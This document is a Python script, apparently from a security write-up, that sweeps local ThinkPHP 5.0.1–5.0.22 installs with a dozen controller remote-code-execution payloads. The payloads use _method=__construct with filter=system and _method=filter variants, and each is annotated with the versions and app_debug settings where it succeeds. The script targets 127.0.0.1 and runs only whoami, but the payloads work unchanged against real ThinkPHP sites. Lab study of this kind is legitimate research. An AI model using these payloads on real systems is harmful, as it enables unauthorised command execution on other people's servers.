thinkphp(一) : 5.0.1~22控制器RCE

RCE版本范围 : 5.0.1~22

import requests,time
# Query string appended to every probed URL (one of the commented-out
# ``args`` values below, or empty for none).
args = str()
# Request body: a dict, or a "k=v&k=v" string that the script converts with
# get_data() before use.  Empty means once() sends a GET instead of a POST.
data = dict()
# debug=false时无RCE,debug=true时5.0.21~22
# data={"_method":"__construct","filter":"system","server[REQUEST_METHOD]":"whoami"}

#debug=false时5.0.1~12,debug=true时5.0.1~20
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.19,debug=true时5.0.2~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=get&get[]=whoami"

#debug=false时无RCE,debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami"

# debug=false时5.0.19,debug=true时5.0.22~22
# args="?s=captcha"
# data="_method=__construct&filter=system&method=get&get[]=whoami"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~22
# args="?s=index/index"
# data="_method=__construct&method=GET&filter[]=system&get[]=whoami"

#debug=false时5.0.8~12,debug=true时5.0.8~20
# args="?s=index/index"
# data="c=system&f=whoami&_method=filter"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="s=whoami&_method=__construct&method=POST&filter[]=system"

#debug=false时5.0.1~12,debug=true时5.0.1~20
# args="?s=index/index"
# data="aaaa=whoami&_method=__construct&method=GET&filter[]=system"

#debug=false时无RCE,debug=true时5.0.21~22
# args="?s=captcha"
# data="_method=__construct&filter[]=system&method=GET&server[REQUEST_METHOD]=whoami"

# Template for each local test install; ``{version}`` is filled in by once().
url = "http://127.0.0.1/tp/tp{version}/public/index.php"
# Marker that once() looks for in a response body to count a version as hit.
judeju_str = "laptop-da05slh8\\26406"
# Collected results, printed after each sweep (one sweep per app_debug value).
success = list()
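def get_data(post_data):
    """Parse a ``k=v&k=v`` query-string style body into a dict.

    Each ``&``-separated field is split on its *first* ``=`` only, so a value
    that itself contains ``=`` is kept intact (the original split on every
    ``=`` and raised IndexError on a field with no ``=``).  A field without
    ``=`` maps to an empty string; empty fields (e.g. from an empty input or
    a trailing ``&``) are skipped.  Later duplicates of a key overwrite
    earlier ones and no URL-decoding is performed, matching how the
    commented-out payload strings above are written.  The split fields are
    echoed to stdout for debugging, as before.

    Args:
        post_data: the body string (anything else is ``str()``-ed first).

    Returns:
        dict mapping field name to its raw value.
    """
    fields = str(post_data).split("&")
    print(fields)
    parsed = {}
    for field in fields:
        if not field:
            continue
        key, _, value = field.partition("=")
        parsed[key] = value
    return parsed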

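def change_debug(file_anme, data):
    """Overwrite ``file_anme`` with ``data``.

    Used by the sweep below to rewrite a local install's ``.env`` so that
    ``app_debug`` can be toggled between runs.  The file is opened in a
    ``with`` block so the handle is closed even if the write raises (the
    original left it open on error).

    Args:
        file_anme: path of the file to (re)create; existing content is lost.
        data: text written verbatim.

    Raises:
        OSError: if the path cannot be opened or written, e.g. because the
            install directory does not exist.
    """
    with open(file_anme, "w", encoding="utf-8") as f:
        f.write(data)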

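def once():
    """Request every local 5.0.x install once and record which ones match.

    For each version 5.0.0 .. 5.0.24 the URL is built from the module-level
    ``url`` template plus ``args``; ``data`` is sent as a POST body when it is
    non-empty, otherwise a plain GET is made.  A version is appended to the
    module-level ``success`` list when ``judeju_str`` occurs in the response
    body.  Requests carry a timeout, and a failed request (connection
    refused, timeout, e.g. a version that is not installed) is reported and
    skipped instead of aborting the rest of the sweep, as it did before.
    The unused ``_args`` / ``r`` locals of the original are gone.
    """
    for i in range(25):
        version = "5.0." + str(i)
        _url = url.format(version=version) + args
        print(i)
        try:
            if data:
                text = requests.post(_url, data, timeout=10).text
            else:
                text = requests.get(_url, timeout=10).text
        except requests.RequestException as exc:
            # One unreachable install must not stop the remaining versions.
            print("request failed:", exc)
            continue
        if judeju_str in text:
            print("success!!!")
            success.append(version)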

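# Accept the commented-out string form of ``data`` as well as a dict.
if not isinstance(data, dict):
    data = get_data(data)

# Path of each local install's .env; a raw string so the backslashes are not
# read as escapes (the original "\p" and "\." spellings were invalid escape
# sequences that only happened to evaluate to the intended characters).
file_name = r"D:\phpstudy\WWW\tp\tp5.0.{version}\.env"

for debug in ["false", "true"]:
    success.append("debug=" + debug + "时,成功RCE的有:")
    print("Here is \"app_debug = " + debug + "\"")
    # Flip app_debug in every local install before the sweep.
    for i in range(25):
        try:
            change_debug(file_name.format(version=str(i)), "app_debug = " + debug)
        except OSError:
            # Only a missing install is tolerated here (there is no 5.0.17
            # and no 5.0.23 directory); the bare except of the original also
            # hid every other error.
            pass
    once()
    print(success)
    for j in success:
        print(str(j))
    print()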